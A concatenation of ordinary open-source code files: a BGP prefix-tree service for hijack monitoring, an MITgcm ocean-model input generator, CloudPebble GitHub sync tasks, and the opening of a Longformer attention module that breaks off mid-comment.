if self.shared_memory_manager_dict["service_reconfiguring"]:
status += ",reconfiguring"
self.write({"status": status})
class ControlHandler(RequestHandler):
"""
REST request handler for control commands.
"""
def initialize(self, shared_memory_manager_dict):
self.shared_memory_manager_dict = shared_memory_manager_dict
def start_data_worker(self):
shared_memory_locks["data_worker"].acquire()
if self.shared_memory_manager_dict["data_worker_running"]:
log.info("data worker already running")
shared_memory_locks["data_worker"].release()
return "already running"
shared_memory_locks["data_worker"].release()
mp.Process(target=self.run_data_worker_process).start()
return "instructed to start"
def run_data_worker_process(self):
try:
with Connection(RABBITMQ_URI) as connection:
shared_memory_locks["data_worker"].acquire()
data_worker = PrefixTreeDataWorker(
connection, self.shared_memory_manager_dict
)
self.shared_memory_manager_dict["data_worker_running"] = True
shared_memory_locks["data_worker"].release()
log.info("data worker started")
data_worker.run()
except Exception:
log.exception("exception")
finally:
shared_memory_locks["data_worker"].acquire()
self.shared_memory_manager_dict["data_worker_running"] = False
shared_memory_locks["data_worker"].release()
log.info("data worker stopped")
@staticmethod
def stop_data_worker():
shared_memory_locks["data_worker"].acquire()
try:
with Connection(RABBITMQ_URI) as connection:
with Producer(connection) as producer:
command_exchange = create_exchange("command", connection)
producer.publish(
"",
exchange=command_exchange,
routing_key="stop-{}".format(SERVICE_NAME),
serializer="ujson",
)
except Exception:
log.exception("exception")
finally:
shared_memory_locks["data_worker"].release()
message = "instructed to stop"
return message
def post(self):
"""
Instruct a service to start or stop by posting a command.
Sample request body
{
"command": <start|stop>
}
:return: {"success": True|False, "message": <message>}
"""
try:
msg = json.loads(self.request.body)
command = msg["command"]
# start/stop data_worker
if command == "start":
message = self.start_data_worker()
self.write({"success": True, "message": message})
elif command == "stop":
message = self.stop_data_worker()
self.write({"success": True, "message": message})
else:
self.write({"success": False, "message": "unknown command"})
except Exception:
log.exception("Exception")
self.write({"success": False, "message": "error during control"})
class ConfiguredPrefixCountHandler(RequestHandler):
"""
REST request handler for configured prefix count information.
"""
def initialize(self, shared_memory_manager_dict):
self.shared_memory_manager_dict = shared_memory_manager_dict
def get(self):
"""
Simply provides the configured prefix count (in the form of a JSON dict) to the requester
"""
self.write(
{
"configured_prefix_count": self.shared_memory_manager_dict[
"configured_prefix_count"
]
}
)
class MonitoredPrefixesHandler(RequestHandler):
"""
REST request handler for monitored prefixes information.
"""
def initialize(self, shared_memory_manager_dict):
self.shared_memory_manager_dict = shared_memory_manager_dict
def get(self):
"""
Simply provides the monitored prefixes (in the form of a JSON dict) to the requester
"""
self.write(
{
"monitored_prefixes": self.shared_memory_manager_dict[
"monitored_prefixes"
]
}
)
class PrefixTree:
"""
Prefix Tree Service.
"""
def __init__(self):
# initialize shared memory
shared_memory_manager = mp.Manager()
self.shared_memory_manager_dict = shared_memory_manager.dict()
self.shared_memory_manager_dict["data_worker_running"] = False
self.shared_memory_manager_dict["service_reconfiguring"] = False
self.shared_memory_manager_dict["prefix_tree"] = {"v4": {}, "v6": {}}
self.shared_memory_manager_dict["prefix_tree_recalculate"] = True
self.shared_memory_manager_dict["monitored_prefixes"] = list()
self.shared_memory_manager_dict["configured_prefix_count"] = 0
self.shared_memory_manager_dict["autoignore_rules"] = {}
self.shared_memory_manager_dict["autoignore_prefix_tree"] = {"v4": {}, "v6": {}}
self.shared_memory_manager_dict["autoignore_recalculate"] = True
self.shared_memory_manager_dict["config_timestamp"] = -1
log.info("service initiated")
def make_rest_app(self):
return Application(
[
(
"/config",
ConfigHandler,
dict(shared_memory_manager_dict=self.shared_memory_manager_dict),
),
(
"/control",
ControlHandler,
dict(shared_memory_manager_dict=self.shared_memory_manager_dict),
),
(
"/health",
HealthHandler,
dict(shared_memory_manager_dict=self.shared_memory_manager_dict),
),
(
"/configuredPrefixCount",
ConfiguredPrefixCountHandler,
dict(shared_memory_manager_dict=self.shared_memory_manager_dict),
),
(
"/monitoredPrefixes",
MonitoredPrefixesHandler,
dict(shared_memory_manager_dict=self.shared_memory_manager_dict),
),
]
)
def start_rest_app(self):
app = self.make_rest_app()
app.listen(REST_PORT)
log.info("REST worker started and listening to port {}".format(REST_PORT))
IOLoop.current().start()
class PrefixTreeDataWorker(ConsumerProducerMixin):
"""
RabbitMQ Consumer/Producer for the prefix tree Service.
"""
def __init__(
self, connection: Connection, shared_memory_manager_dict: Dict
) -> NoReturn:
self.connection = connection
self.redis = redis.Redis(host=REDIS_HOST, port=REDIS_PORT)
ping_redis(self.redis)
self.shared_memory_manager_dict = shared_memory_manager_dict
self.prefix_tree = {"v4": pytricia.PyTricia(32), "v6": pytricia.PyTricia(128)}
shared_memory_locks["prefix_tree"].acquire()
if self.shared_memory_manager_dict["prefix_tree_recalculate"]:
for ip_version in ["v4", "v6"]:
if ip_version == "v4":
size = 32
else:
size = 128
self.prefix_tree[ip_version] = dict_to_pytricia(
self.shared_memory_manager_dict["prefix_tree"][ip_version], size
)
log.info(
"{} pytricia tree parsed from configuration".format(ip_version)
)
self.shared_memory_manager_dict["prefix_tree_recalculate"] = False
shared_memory_locks["prefix_tree"].release()
self.autoignore_prefix_tree = {
"v4": pytricia.PyTricia(32),
"v6": pytricia.PyTricia(128),
}
shared_memory_locks["autoignore"].acquire()
if self.shared_memory_manager_dict["autoignore_recalculate"]:
for ip_version in ["v4", "v6"]:
if ip_version == "v4":
size = 32
else:
size = 128
self.autoignore_prefix_tree[ip_version] = dict_to_pytricia(
self.shared_memory_manager_dict["autoignore_prefix_tree"][
ip_version
],
size,
)
log.info(
"{} pytricia tree parsed from configuration".format(ip_version)
)
self.shared_memory_manager_dict["autoignore_recalculate"] = False
shared_memory_locks["autoignore"].release()
# EXCHANGES
self.update_exchange = create_exchange("bgp-update", connection, declare=True)
self.hijack_exchange = create_exchange(
"hijack-update", connection, declare=True
)
self.autoconf_exchange = create_exchange("autoconf", connection, declare=True)
self.pg_amq_bridge = create_exchange("amq.direct", connection)
self.mitigation_exchange = create_exchange(
"mitigation", connection, declare=True
)
self.autoignore_exchange = create_exchange(
"autoignore", connection, declare=True
)
self.command_exchange = create_exchange("command", connection, declare=True)
# QUEUES
self.update_queue = create_queue(
SERVICE_NAME,
exchange=self.update_exchange,
routing_key="update",
priority=1,
)
self.hijack_ongoing_queue = create_queue(
SERVICE_NAME,
exchange=self.hijack_exchange,
routing_key="ongoing",
priority=1,
)
self.pg_amq_update_queue = create_queue(
SERVICE_NAME,
exchange=self.pg_amq_bridge,
routing_key="update-insert",
priority=1,
)
self.mitigation_request_queue = create_queue(
SERVICE_NAME,
exchange=self.mitigation_exchange,
routing_key="mitigate",
priority=2,
)
self.unmitigation_request_queue = create_queue(
SERVICE_NAME,
exchange=self.mitigation_exchange,
routing_key="unmitigate",
priority=2,
)
self.stop_queue = create_queue(
"{}-{}".format(SERVICE_NAME, uuid()),
exchange=self.command_exchange,
routing_key="stop-{}".format(SERVICE_NAME),
priority=1,
)
self.autoconf_update_queue = create_queue(
SERVICE_NAME,
exchange=self.autoconf_exchange,
routing_key="update",
priority=4,
random=True,
)
self.ongoing_hijack_prefixes_queue = create_queue(
SERVICE_NAME,
exchange=self.autoignore_exchange,
routing_key="ongoing-hijack-prefixes",
priority=1,
random=True,
)
log.info("data worker initiated")
def get_consumers(self, Consumer: Consumer, channel: Connection) -> List[Consumer]:
return [
Consumer(
queues=[self.update_queue],
on_message=self.annotate_bgp_update,
prefetch_count=100,
accept=["ujson"],
),
Consumer(
queues=[self.hijack_ongoing_queue],
on_message=self.annotate_ongoing_hijack_updates,
prefetch_count=100,
accept=["ujson"],
),
Consumer(
queues=[self.mitigation_request_queue],
on_message=self.annotate_mitigation_request,
prefetch_count=100,
accept=["ujson", "json"],
),
Consumer(
queues=[self.unmitigation_request_queue],
on_message=self.annotate_unmitigation_request,
prefetch_count=100,
accept=["ujson", "json"],
),
Consumer(
queues=[self.pg_amq_update_queue],
on_message=self.annotate_stored_bgp_update,
prefetch_count=100,
accept=["ujson", "txtjson"],
),
Consumer(
queues=[self.stop_queue],
on_message=self.stop_consumer_loop,
prefetch_count=100,
accept=["ujson"],
),
Consumer(
queues=[self.autoconf_update_queue],
on_message=self.handle_autoconf_updates,
prefetch_count=100,
accept=["ujson"],
),
Consumer(
queues=[self.ongoing_hijack_prefixes_queue],
on_message=self.handle_ongoing_hijack_prefixes,
prefetch_count=100,
accept=["ujson"],
),
]
def find_prefix_node(self, prefix):
ip_version = get_ip_version(prefix)
prefix_node = None
shared_memory_locks["prefix_tree"].acquire()
if ip_version == "v4":
size = 32
else:
size = 128
# need to turn to pytricia tree since this means that the tree has changed due to re-configuration
if self.shared_memory_manager_dict["prefix_tree_recalculate"]:
self.prefix_tree[ip_version] = dict_to_pytricia(
self.shared_memory_manager_dict["prefix_tree"][ip_version], size
)
log.info("{} pytricia tree re-parsed from configuration".format(ip_version))
self.shared_memory_manager_dict["prefix_tree_recalculate"] = False
if prefix in self.prefix_tree[ip_version]:
prefix_node = self.prefix_tree[ip_version][prefix]
shared_memory_locks["prefix_tree"].release()
return prefix_node
def find_autoignore_prefix_node(self, prefix):
ip_version = get_ip_version(prefix)
prefix_node = None
shared_memory_locks["autoignore"].acquire()
if ip_version == "v4":
size = 32
else:
size = 128
# need to turn to pytricia tree since this means that the tree has changed due to re-configuration
if self.shared_memory_manager_dict["autoignore_recalculate"]:
self.autoignore_prefix_tree[ip_version] = dict_to_pytricia(
self.shared_memory_manager_dict["autoignore_prefix_tree"][ip_version],
size,
)
log.info(
"{} autoignore pytricia tree re-parsed from configuration".format(
ip_version
)
)
self.shared_memory_manager_dict["autoignore_recalculate"] = False
if prefix in self.autoignore_prefix_tree[ip_version]:
prefix_node = self.autoignore_prefix_tree[ip_version][prefix]
shared_memory_locks["autoignore"].release()
return prefix_node
def annotate_bgp_update(self, message: Dict) -> NoReturn:
"""
Callback function that annotates an incoming bgp update with the associated
configuration node (otherwise it discards it).
"""
message.ack()
bgp_update = message.payload
try:
prefix_node = self.find_prefix_node(bgp_update["prefix"])
if prefix_node:
bgp_update["prefix_node"] = prefix_node
self.producer.publish(
bgp_update,
exchange=self.update_exchange,
routing_key="update-with-prefix-node",
serializer="ujson",
)
# else:
# log.warning("unconfigured BGP update received '{}'".format(bgp_update))
except Exception:
log.exception("exception")
def annotate_stored_bgp_update(self, message: Dict) -> NoReturn:
"""
Callback function that annotates an incoming (stored) bgp update with the associated
configuration node (otherwise it discards it).
"""
message.ack()
bgp_update = message.payload
try:
prefix_node = self.find_prefix_node(bgp_update["prefix"])
if prefix_node:
bgp_update["prefix_node"] = prefix_node
self.producer.publish(
bgp_update,
exchange=self.update_exchange,
routing_key="stored-update-with-prefix-node",
serializer="ujson",
)
else:
log.warning(
"unconfigured stored BGP update received '{}'".format(bgp_update)
)
except Exception:
log.exception("exception")
def annotate_ongoing_hijack_updates(self, message: Dict) -> NoReturn:
"""
Callback function that annotates incoming ongoing hijack updates with the associated
configuration nodes (otherwise it discards them).
"""
message.ack()
bgp_updates = []
for bgp_update in message.payload:
try:
prefix_node = self.find_prefix_node(bgp_update["prefix"])
if prefix_node:
bgp_update["prefix_node"] = prefix_node
bgp_updates.append(bgp_update)
except Exception:
log.exception("exception")
self.producer.publish(
bgp_updates,
exchange=self.hijack_exchange,
routing_key="ongoing-with-prefix-node",
serializer="ujson",
)
def annotate_mitigation_request(self, message: Dict) -> NoReturn:
"""
Callback function that annotates incoming hijack mitigation requests with the associated
mitigation action/instruction (otherwise it discards them).
"""
message.ack()
mit_request = message.payload
try:
prefix_node = self.find_prefix_node(mit_request["prefix"])
if prefix_node:
annotated_mit_request = {}
# use the first best matching rule mitigation action;
# a prefix should not have different mitigation actions anyway
annotated_mit_request["hijack_info"] = mit_request
annotated_mit_request["mitigation_action"] = prefix_node["data"][
"confs"
][0]["mitigation"]
self.producer.publish(
annotated_mit_request,
exchange=self.mitigation_exchange,
routing_key="mitigate-with-action",
serializer="ujson",
)
except Exception:
log.exception("exception")
def annotate_unmitigation_request(self, message: Dict) -> NoReturn:
"""
Callback function that annotates incoming hijack unmitigation requests with the associated
unmitigation action/instruction (otherwise it discards them).
"""
message.ack()
unmit_request = message.payload
try:
prefix_node = self.find_prefix_node(unmit_request["prefix"])
if prefix_node:
annotated_unmit_request = {}
# use the first best matching rule mitigation action;
# a prefix should not have different mitigation actions anyway
annotated_unmit_request["hijack_info"] = unmit_request
annotated_unmit_request["mitigation_action"] = prefix_node["data"][
"confs"
][0]["mitigation"]
self.producer.publish(
annotated_unmit_request,
exchange=self.mitigation_exchange,
routing_key="unmitigate-with-action",
serializer="ujson",
)
except Exception:
log.exception("exception")
def handle_autoconf_updates(self, message: List) -> NoReturn:
"""
Callback function that filters incoming autoconf updates based on whether their
encoded information already exists in the configuration (prefixtree).
"""
message.ack()
bgp_updates = message.payload
if not isinstance(bgp_updates, list):
bgp_updates = [bgp_updates]
bgp_updates_to_send_to_conf = list()
delete_from_redis_without_sending_to_autoconf = set()
for bgp_update in bgp_updates:
# if you have seen the exact same update before, do nothing
if self.redis.get(bgp_update["key"]):
return
if self.redis.exists(
"autoconf-update-keys-to-process"
) and not self.redis.sismember(
"autoconf-update-keys-to-process", bgp_update["key"]
):
return
prefix_node = self.find_prefix_node(bgp_update["prefix"])
add_update = True
            # small optimization: if the prefix exists in the prefix tree and we have an update for an existing origin, discard it
# attention: subprefixes belong to existing prefix nodes, so the check should also account
# for exact prefix equality if it is to be deleted from the cache
if (
prefix_node
and bgp_update["prefix"] == prefix_node["prefix"]
and bgp_update["type"] == "A"
):
try:
as_path = bgp_update["path"]
origin = as_path[-1]
for conf in prefix_node["data"]["confs"]:
if origin in conf["origin_asns"]:
add_update = False
break
except Exception:
log.exception("exception")
add_update = False
if not add_update:
delete_from_redis_without_sending_to_autoconf.add(bgp_update["key"])
else:
bgp_updates_to_send_to_conf.append(bgp_update)
if self.redis.exists("autoconf-update-keys-to-process"):
redis_pipeline = self.redis.pipeline()
for bgp_update_key in delete_from_redis_without_sending_to_autoconf:
redis_pipeline.srem("autoconf-update-keys-to-process", bgp_update_key)
redis_pipeline.execute()
self.producer.publish(
bgp_updates_to_send_to_conf,
exchange=self.autoconf_exchange,
routing_key="filtered-update",
retry=True,
priority=4,
serializer="ujson",
)
def handle_ongoing_hijack_prefixes(self, message: Dict) -> NoReturn:
"""
Callback function that checks whether ongoing hijack prefixes match
an autoignore rule (included in the message).
"""
message.ack()
ongoing_hijacks_to_prefixes = message.payload["ongoing_hijacks_to_prefixes"]
autoignore_rule_key = message.payload["rule_key"]
hijacks_matching_rule = set()
for hijack_key in ongoing_hijacks_to_prefixes:
try:
autoignore_prefix_node = self.find_autoignore_prefix_node(
ongoing_hijacks_to_prefixes[hijack_key]
)
if (
autoignore_prefix_node
and autoignore_prefix_node["rule_key"] == autoignore_rule_key
):
hijacks_matching_rule.add(hijack_key)
except Exception:
log.exception("exception")
self.producer.publish(
{
"hijacks_matching_rule": list(hijacks_matching_rule),
"rule_key": autoignore_rule_key,
},
exchange=self.autoignore_exchange,
routing_key="hijacks-matching-rule",
retry=True,
priority=1,
serializer="ujson",
)
def stop_consumer_loop(self, message: Dict) -> NoReturn:
"""
        Callback function that stops the current consumer loop
"""
message.ack()
self.should_stop = True
def main():
# initiate prefix tree service with REST
prefixTreeService = PrefixTree()
# try to get configuration upon start (it is OK if it fails, will get it from POST)
# (this is needed because service may restart while configuration is running)
try:
r = requests.get("http://{}:{}/config".format(CONFIGURATION_HOST, REST_PORT))
conf_res = configure_prefixtree(
r.json(), prefixTreeService.shared_memory_manager_dict
)
if not conf_res["success"]:
log.info(
"could not get configuration upon startup, will get via POST later"
)
except Exception:
log.info("could not get configuration upon startup, will get via POST later")
# start REST within main process
prefixTreeService.start_rest_app()
if __name__ == "__main__":
main()
|
verification/tutorial_barotropic_gyre/input/gendata.py
|
mitgcm/mitgcm
| 247 |
78740
|
<reponame>mitgcm/mitgcm
import numpy as np
from numpy import cos, sin, pi
Ho = 5000 # ocean depth in meters
nx = 62 # number of gridpoints in x-direction
ny = 62 # number of gridpoints in y-direction
xo = 0 # origin in x,y for ocean domain
yo = 0 # (i.e. southwestern corner of ocean domain)
dx = 20 # grid spacing in x (km)
dy = 20 # grid spacing in y (km)
xeast = xo + (nx-2)*dx # eastern extent of ocean domain
ynorth = yo + (ny-2)*dy # northern extent of ocean domain
# Flat bottom at z=-Ho
h = -Ho * np.ones((ny, nx))
# Walls (surrounding domain); generate bathymetry file
h[:, [0,-1]] = 0 # set ocean depth to zero at east and west walls
h[[0,-1], :] = 0 # set ocean depth to zero at south and north walls
# save as single-precision (float32) with big-endian byte ordering
h.astype('>f4').tofile('bathy.bin')
# Ocean domain extends from (xo,yo) to (xeast,ynorth)
# (i.e. the ocean spans nx-2, ny-2 grid cells)
# out-of-box-config: xo=yo=0, dx=dy=20 km, ocean extent (0,0)-(1200,1200) km
# model domain includes a land cell surrounding the ocean domain
# The full model domain cell centers are located at:
# XC[0,:] = -10, +10, ..., +1210 (km)
# YC[:,0] = -10, +10, ..., +1210 (km)
# and full model domain cell corners are located at:
# XG[0,:] = -20, 0, ..., 1200 [, 1220] (km)
# YG[:,0] = -20, 0, ..., 1200 [, 1220] (km)
# where the last value in brackets is not included in the MITgcm grid variable
# and reflects the eastern and northern edge of the model domain respectively.
# See section 2.11.4 of the MITgcm users manual.
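# Illustrative sketch (added note, not part of the original gendata.py): the coordinates listed
# above follow directly from the grid parameters; xc_demo/xg_demo are hypothetical helper names.
xc_demo = xo + (np.arange(nx) - 0.5)*dx   # cell centers XC: -10, 10, ..., 1210 (km)
xg_demo = xo + (np.arange(nx) - 1.0)*dx   # cell corners XG: -20, 0, ..., 1200 (km)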
# Zonal wind-stress, located at u-points (see section 2.11.4)
# here we non-dimensionalize: 0 at southern and western ocean boundary
# to 1.0 at eastern and northern ocean boundary
# for the purpose of applying sinusoidal-shaped wind stress curve
tauMax = 0.1 # wind stress maximum
x = (np.arange(nx)-1) / (nx-2) # x-coordinate, located at XG points
y = (np.arange(ny)-.5) / (ny-2) # y-coordinate, located at YC points
Y, X = np.meshgrid(y, x, indexing='ij')
tau = -tauMax * cos(Y*pi) # generate file for -cos(y) profile between 0-1200km
tau.astype('>f4').tofile('windx_cosy.bin')
tau = tauMax * sin(Y*pi) # generate file for +sin(y) profile between 0-1200km
tau.astype('>f4').tofile('windx_siny.bin')
# Meridional wind-stress, if desired, would be located at v-points (XC, YG)
|
ide/tasks/git.py
|
Ramonrlb/cloudpebble
| 147 |
78756
|
import base64
import urllib2
import json
import os
import logging
from celery import task
from django.conf import settings
from django.utils.timezone import now
from github.GithubObject import NotSet
from github import Github, GithubException, InputGitTreeElement
from ide.git import git_auth_check, get_github
from ide.models.build import BuildResult
from ide.models.project import Project
from ide.tasks import do_import_archive, run_compile
from ide.utils.git import git_sha, git_blob
from ide.utils.project import find_project_root_and_manifest, BaseProjectItem, InvalidProjectArchiveException
from ide.utils.sdk import generate_manifest_dict, generate_manifest, generate_wscript_file, manifest_name_for_project
from utils.td_helper import send_td_event
__author__ = 'katharine'
logger = logging.getLogger(__name__)
@task(acks_late=True)
def do_import_github(project_id, github_user, github_project, github_branch, delete_project=False):
try:
url = "https://github.com/%s/%s/archive/%s.zip" % (github_user, github_project, github_branch)
if file_exists(url):
u = urllib2.urlopen(url)
return do_import_archive(project_id, u.read())
else:
raise Exception("The branch '%s' does not exist." % github_branch)
except Exception as e:
try:
project = Project.objects.get(pk=project_id)
user = project.owner
except:
project = None
user = None
if delete_project and project is not None:
try:
project.delete()
except:
pass
send_td_event('cloudpebble_github_import_failed', data={
'data': {
'reason': e.message,
'github_user': github_user,
'github_project': github_project,
'github_branch': github_branch
}
}, user=user)
raise
def file_exists(url):
request = urllib2.Request(url)
request.get_method = lambda: 'HEAD'
try:
urllib2.urlopen(request)
except:
return False
else:
return True
@git_auth_check
def github_push(user, commit_message, repo_name, project):
g = Github(user.github.token, client_id=settings.GITHUB_CLIENT_ID, client_secret=settings.GITHUB_CLIENT_SECRET)
repo = g.get_repo(repo_name)
try:
branch = repo.get_branch(project.github_branch or repo.master_branch)
except GithubException:
raise Exception("Unable to get branch.")
commit = repo.get_git_commit(branch.commit.sha)
tree = repo.get_git_tree(commit.tree.sha, recursive=True)
next_tree = {x.path: InputGitTreeElement(path=x.path, mode=x.mode, type=x.type, sha=x.sha) for x in tree.tree}
try:
root, manifest_item = find_project_root_and_manifest([GitProjectItem(repo, x) for x in tree.tree])
except InvalidProjectArchiveException:
root = ''
manifest_item = None
expected_paths = set()
def update_expected_paths(new_path):
# This adds the path *and* its parent directories to the list of expected paths.
# The parent directories are already keys in next_tree, so if they aren't present in expected_paths
# then, when iterating over next_tree to see which files have been deleted, we would have to treat
# directories as special cases.
split_path = new_path.split('/')
expected_paths.update('/'.join(split_path[:p]) for p in range(2, len(split_path) + 1))
project_sources = project.source_files.all()
has_changed = False
for source in project_sources:
repo_path = os.path.join(root, source.project_path)
update_expected_paths(repo_path)
if repo_path not in next_tree:
has_changed = True
next_tree[repo_path] = InputGitTreeElement(path=repo_path, mode='100644', type='blob',
content=source.get_contents())
logger.debug("New file: %s", repo_path)
else:
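            # (added note) `_InputGitTreeElement__sha` is the name-mangled private `__sha` attribute of
            # PyGithub's InputGitTreeElement; it is read here to compare blob hashes and overwritten
            # below to update existing tree entries in place.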
sha = next_tree[repo_path]._InputGitTreeElement__sha
our_content = source.get_contents()
expected_sha = git_sha(our_content)
if expected_sha != sha:
logger.debug("Updated file: %s", repo_path)
next_tree[repo_path]._InputGitTreeElement__sha = NotSet
next_tree[repo_path]._InputGitTreeElement__content = our_content
has_changed = True
# Now try handling resource files.
resources = project.resources.all()
resource_root = project.resources_path
for res in resources:
for variant in res.variants.all():
repo_path = os.path.join(resource_root, variant.path)
update_expected_paths(repo_path)
if repo_path in next_tree:
content = variant.get_contents()
if git_sha(content) != next_tree[repo_path]._InputGitTreeElement__sha:
logger.debug("Changed resource: %s", repo_path)
has_changed = True
blob = repo.create_git_blob(base64.b64encode(content), 'base64')
logger.debug("Created blob %s", blob.sha)
next_tree[repo_path]._InputGitTreeElement__sha = blob.sha
else:
logger.debug("New resource: %s", repo_path)
has_changed = True
blob = repo.create_git_blob(base64.b64encode(variant.get_contents()), 'base64')
logger.debug("Created blob %s", blob.sha)
next_tree[repo_path] = InputGitTreeElement(path=repo_path, mode='100644', type='blob', sha=blob.sha)
# Manage deleted files
src_root = os.path.join(root, 'src')
worker_src_root = os.path.join(root, 'worker_src')
for path in next_tree.keys():
if not (any(path.startswith(root+'/') for root in (src_root, resource_root, worker_src_root))):
continue
if path not in expected_paths:
del next_tree[path]
logger.debug("Deleted file: %s", path)
has_changed = True
# Compare the resource dicts
remote_manifest_path = root + manifest_name_for_project(project)
remote_wscript_path = root + 'wscript'
if manifest_item:
their_manifest_dict = json.loads(manifest_item.read())
their_res_dict = their_manifest_dict.get('resources', their_manifest_dict.get('pebble', their_manifest_dict).get('resources', {'media': []}))
# If the manifest needs a new path (e.g. it is now package.json), delete the old one
if manifest_item.path != remote_manifest_path:
del next_tree[manifest_item.path]
else:
their_manifest_dict = {}
their_res_dict = {'media': []}
our_manifest_dict = generate_manifest_dict(project, resources)
our_res_dict = our_manifest_dict.get('resources', our_manifest_dict.get('pebble', our_manifest_dict).get('resources', {'media': []}))
if our_res_dict != their_res_dict:
logger.debug("Resources mismatch.")
has_changed = True
# Try removing things that we've deleted, if any
to_remove = set(x['file'] for x in their_res_dict['media']) - set(x['file'] for x in our_res_dict['media'])
for path in to_remove:
repo_path = resource_root + path
if repo_path in next_tree:
logger.debug("Deleted resource: %s", repo_path)
del next_tree[repo_path]
# This one is separate because there's more than just the resource map changing.
if their_manifest_dict != our_manifest_dict:
has_changed = True
if remote_manifest_path in next_tree:
next_tree[remote_manifest_path]._InputGitTreeElement__sha = NotSet
next_tree[remote_manifest_path]._InputGitTreeElement__content = generate_manifest(project, resources)
else:
next_tree[remote_manifest_path] = InputGitTreeElement(path=remote_manifest_path, mode='100644', type='blob',
content=generate_manifest(project, resources))
if project.project_type == 'native' and remote_wscript_path not in next_tree:
next_tree[remote_wscript_path] = InputGitTreeElement(path=remote_wscript_path, mode='100644', type='blob',
content=generate_wscript_file(project, True))
has_changed = True
# Commit the new tree.
if has_changed:
logger.debug("Has changed; committing")
# GitHub seems to choke if we pass the raw directory nodes off to it,
# so we delete those.
for x in next_tree.keys():
if next_tree[x]._InputGitTreeElement__mode == '040000':
del next_tree[x]
logger.debug("removing subtree node %s", x)
logger.debug([x._InputGitTreeElement__mode for x in next_tree.values()])
git_tree = repo.create_git_tree(next_tree.values())
logger.debug("Created tree %s", git_tree.sha)
git_commit = repo.create_git_commit(commit_message, git_tree, [commit])
logger.debug("Created commit %s", git_commit.sha)
git_ref = repo.get_git_ref('heads/%s' % (project.github_branch or repo.master_branch))
git_ref.edit(git_commit.sha)
logger.debug("Updated ref %s", git_ref.ref)
project.github_last_commit = git_commit.sha
project.github_last_sync = now()
project.save()
return True
send_td_event('cloudpebble_github_push', data={
'data': {
'repo': project.github_repo
}
}, user=user)
return False
def get_root_path(path):
path, extension = os.path.splitext(path)
return path.split('~', 1)[0] + extension
class GitProjectItem(BaseProjectItem):
def __init__(self, repo, tree_item):
self.repo = repo
self.git_item = tree_item
def read(self):
return git_blob(self.repo, self.git_item.sha)
@property
def path(self):
return self.git_item.path
@git_auth_check
def github_pull(user, project):
g = get_github(user)
repo_name = project.github_repo
if repo_name is None:
raise Exception("No GitHub repo defined.")
repo = g.get_repo(repo_name)
# If somehow we don't have a branch set, this will use the "master_branch"
branch_name = project.github_branch or repo.master_branch
try:
branch = repo.get_branch(branch_name)
except GithubException:
raise Exception("Unable to get the branch.")
if project.github_last_commit == branch.commit.sha:
# Nothing to do.
return False
commit = repo.get_git_commit(branch.commit.sha)
tree = repo.get_git_tree(commit.tree.sha, recursive=True)
paths = {x.path: x for x in tree.tree}
paths_notags = {get_root_path(x) for x in paths}
# First try finding the resource map so we don't fail out part-done later.
try:
root, manifest_item = find_project_root_and_manifest([GitProjectItem(repo, x) for x in tree.tree])
except ValueError as e:
raise ValueError("In manifest file: %s" % str(e))
resource_root = root + project.resources_path + '/'
manifest = json.loads(manifest_item.read())
media = manifest.get('resources', {}).get('media', [])
project_type = manifest.get('projectType', 'native')
for resource in media:
path = resource_root + resource['file']
if project_type == 'pebblejs' and resource['name'] in {
'MONO_FONT_14', 'IMAGE_MENU_ICON', 'IMAGE_LOGO_SPLASH', 'IMAGE_TILE_SPLASH'}:
continue
if path not in paths_notags:
raise Exception("Resource %s not found in repo." % path)
# Now we grab the zip.
zip_url = repo.get_archive_link('zipball', branch_name)
u = urllib2.urlopen(zip_url)
# And wipe the project!
# TODO: transaction support for file contents would be nice...
project.source_files.all().delete()
project.resources.all().delete()
# This must happen before do_import_archive or we'll stamp on its results.
project.github_last_commit = branch.commit.sha
project.github_last_sync = now()
project.save()
import_result = do_import_archive(project.id, u.read())
send_td_event('cloudpebble_github_pull', data={
'data': {
'repo': project.github_repo
}
}, user=user)
return import_result
@task
def do_github_push(project_id, commit_message):
project = Project.objects.select_related('owner__github').get(pk=project_id)
return github_push(project.owner, commit_message, project.github_repo, project)
@task
def do_github_pull(project_id):
project = Project.objects.select_related('owner__github').get(pk=project_id)
return github_pull(project.owner, project)
@task
def hooked_commit(project_id, target_commit):
project = Project.objects.select_related('owner__github').get(pk=project_id)
did_something = False
logger.debug("Comparing %s versus %s", project.github_last_commit, target_commit)
if project.github_last_commit != target_commit:
github_pull(project.owner, project)
did_something = True
if project.github_hook_build:
build = BuildResult.objects.create(project=project)
run_compile(build.id)
did_something = True
return did_something
|
lra_benchmarks/models/longformer/longformer_attention.py
|
guyd1995/long-range-arena
| 416 |
78779
|
<filename>lra_benchmarks/models/longformer/longformer_attention.py<gh_stars>100-1000
# Copyright 2021 Google LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# https://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implements Longformer's attention (https://arxiv.org/abs/2004.05150).
Like the current (8/28/20) Huggingface version, we do not support
dilated and autoregressive attention patterns as they require custom CUDA
kernels to be efficient. "Sliding window" and "global" attention patterns are
supported, however.
"""
from flax import nn
from jax import lax
import jax.numpy as jnp
import numpy as np
def _build_global_mask(mask):
"""Builds mask for global attention pattern.
Args:
mask: boolean jax array of shape `[batch_size, seq_len]`.
Returns:
mask, boolean jax array of shape `[batch_size, 1 (n_heads), seq_len,
seq_len]`.
"""
return jnp.logical_or(mask[:, jnp.newaxis, :, jnp.newaxis],
mask[:, jnp.newaxis, jnp.newaxis, :])
def _build_sliding_window_mask(window_size, global_mask):
"""Builds mask for sliding window pattern.
Args:
window_size: int, size of sliding window.
global_mask: boolean jax array of shape `[batch_size, seq_len]`.
Returns:
mask, boolean jax array of shape `[batch_size, 1 (n_heads), seq_len,
seq_len]`.
  If `window_size` is odd, the left and right sides have the same receptive
  field. Otherwise, the right side gets one extra position. Note - we need the
  global mask because, due to the symmetry requirement, non-global positions
  can still attend to global positions.
"""
seq_len = global_mask.shape[1]
right_size = window_size // 2
left_size = window_size - right_size
left_mask = sum(np.eye(seq_len, k=-i) for i in range(left_size))
right_mask = sum(np.eye(seq_len, k=i) for i in range(1, right_size + 1))
mask = left_mask + right_mask
mask = jnp.array(mask[np.newaxis, np.newaxis, :, :]).astype(jnp.bool_)
return jnp.logical_or(mask, _build_global_mask(global_mask))
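# (added worked example) With window_size=3 and no global positions, row i of the resulting mask is
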